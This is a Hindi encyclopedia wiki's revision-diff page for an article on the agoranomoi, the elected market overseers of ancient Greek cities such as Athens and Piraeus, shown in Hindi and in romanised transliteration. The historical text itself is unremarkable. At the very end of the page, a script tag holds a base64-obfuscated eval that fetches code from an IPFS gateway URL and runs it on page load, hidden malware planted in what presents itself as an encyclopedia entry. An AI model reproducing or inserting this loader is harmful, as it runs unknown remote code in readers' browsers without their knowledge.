Difference between revisions of "अगोरानोमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अगोरानोमी''' नामक मंडियों के अध्यक्षों के पद ग्रीक...' के साथ नया पृष्ठ बनाया)
 
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
'''अगोरानोमी''' नामक मंडियों के अध्यक्षों के पद ग्रीक नगरों में 120 से भी अधिक विद्यमान थे। सामान्यतया इनका चुनाव पत्रक या गुटिका द्वारा हुआ करता था। एथेंस में इन अध्यक्षों की संख्या 10 थी जिनमें से मुख्य पाँच नगर के लिए और पाँच पिरेयस्‌ नामक एथेंस के बंदरगाह के लिए चुने जाते थे। इनका कर्तव्य हाट बाजार में व्यवस्था रखना, नाप तौल और पण्य वस्तुओं के गुणावगुण की देखभाल और हाट शुल्क संचय करना था। सामान्य नियमों का उल्लंघन करने वाले अर्थदंड के भागी होते थे तथा इस धन से हाट के भवनों का विस्तार एवं जीर्णोद्धार हुआ करता था। अधिक गंभीर अपराधों के मामलों को यह न्यायालयों में भेज दिया करते थे और इन अभियोगों की अध्यक्षता भी यही करते थे।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=73 |url=}}</ref>  
+
'''अगोरानोमी''' ग्रीक शासन व्यवस्था में मंडियों के अध्यक्षों को कहा जाता था। अगोरानोमी नामक मंडियों के अध्यक्षों के पद ग्रीक नगरों में 120 से भी अधिक विद्यमान थे। सामान्यत: इनका चुनाव पत्रक या गुटिका द्वारा हुआ करता था। [[एथेंस]] में इन अध्यक्षों की संख्या 10 थी, जिनमें से मुख्य पाँच नगर के लिए और पाँच पिरेयस्‌ नामक एथेंस के [[बंदरगाह]] के लिए चुने जाते थे।<br />
 
+
<br />
 
+
*अगोरानोमी का कर्तव्य हाट बाजार में व्यवस्था रखना, नाप तौल और पण्य वस्तुओं के गुणावगुण की देखभाल और हाट शुल्क संचय करना था। सामान्य नियमों का उल्लंघन करने वाले अर्थदंड के भागी होते थे तथा इस धन से हाट के भवनों का विस्तार एवं जीर्णोद्धार हुआ करता था।
 +
*अधिक गंभीर अपराधों के मामलों को अगोरानोमी न्यायालयों में भेज दिया करते थे और इन अभियोगों की अध्यक्षता भी यही करते थे।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=73 |url=}}</ref>  
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 7: Line 8:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
[[Category:हिन्दी विश्वकोश]]
+
{{ऐतिहासिक शासन-प्रशासन}}
 +
[[Category:प्राचीन शासन-प्रशासन]][[Category:इतिहास कोश]][[Category:हिन्दी विश्वकोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:06, 6 August 2020

agoranomi grik shasan vyavastha mean mandiyoan ke adhyakshoan ko kaha jata tha. agoranomi namak mandiyoan ke adhyakshoan ke pad grik nagaroan mean 120 se bhi adhik vidyaman the. samanyat: inaka chunav patrak ya gutika dvara hua karata tha. etheans mean in adhyakshoan ki sankhya 10 thi, jinamean se mukhy paanch nagar ke lie aur paanch pireyash‌ namak etheans ke bandaragah ke lie chune jate the.

  • agoranomi ka kartavy hat bajar mean vyavastha rakhana, nap taul aur pany vastuoan ke gunavagun ki dekhabhal aur hat shulk sanchay karana tha. samany niyamoan ka ullanghan karane vale arthadand ke bhagi hote the tatha is dhan se hat ke bhavanoan ka vistar evan jirnoddhar hua karata tha.
  • adhik ganbhir aparadhoan ke mamaloan ko agoranomi nyayalayoan mean bhej diya karate the aur in abhiyogoan ki adhyakshata bhi yahi karate the.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 1 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 73 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>